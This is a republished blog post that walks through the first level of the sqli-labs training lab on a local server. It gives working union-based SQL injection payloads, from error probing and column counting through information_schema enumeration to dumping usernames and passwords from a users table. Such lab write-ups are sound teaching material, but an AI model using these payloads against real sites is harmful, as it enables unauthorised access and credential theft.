In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-28 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >
Share
Shulou(Shulou.com)06/01 Report--
First comes the first level:
http://127.0.0.1/sqli-labs-master/Less-1/
http://127.0.0.1/sqli-labs-master/Less-1/? id=1'error when testing
You can see the SQL statement error.
Use and 1 = 1 to test:
http://127.0.0.1/sqli-labs-master/Less-1/? id=1' and 1 = 1%23 echo normal
%23 is a '#' comment
Use and 1 = 2 to test: 127.0.0.1/sqli-labs-master/Less-1/? id=1' and 1 = 2%23 returns a failure, indicating that an injection point exists.
Judgment field:
When order by 3, the echo is normal:
http://127.0.0.1/sqli-labs-master/Less-1/? id=1' order by 3 %23
When order by 4, the echo is abnormal:
The description field is 3.
Error Display Echo Library:
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1,2,3 %23
The echoes are 2 and 3.
Use version() to see version:
Use database() to see the database currently used by the site:
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1,version(), database() %23
As you can see from the figure below, the php version used is 5.5.53, and the database name used by the site is security.
Added? id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 Use filter query statements where to view tables in security database
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23
There are four tables:
View columns in the users table
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23
Check username and password:
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1,username,password from users %23
We also see id in the users table. Let's see how many account passwords there are.
Just add where id = n.
After testing id maximum is 14
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1,username,password from users where id = 1%23
http://127.0.0.1/sqli-labs-master/Less-1/? id=-1' union select 1,username,password from users where id = 14%23
End of the first stage:
The second level was updated very quickly.
Disclaimer: The official source code has been changed by me. I added the php code I changed:
Weixin Official Accounts:
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
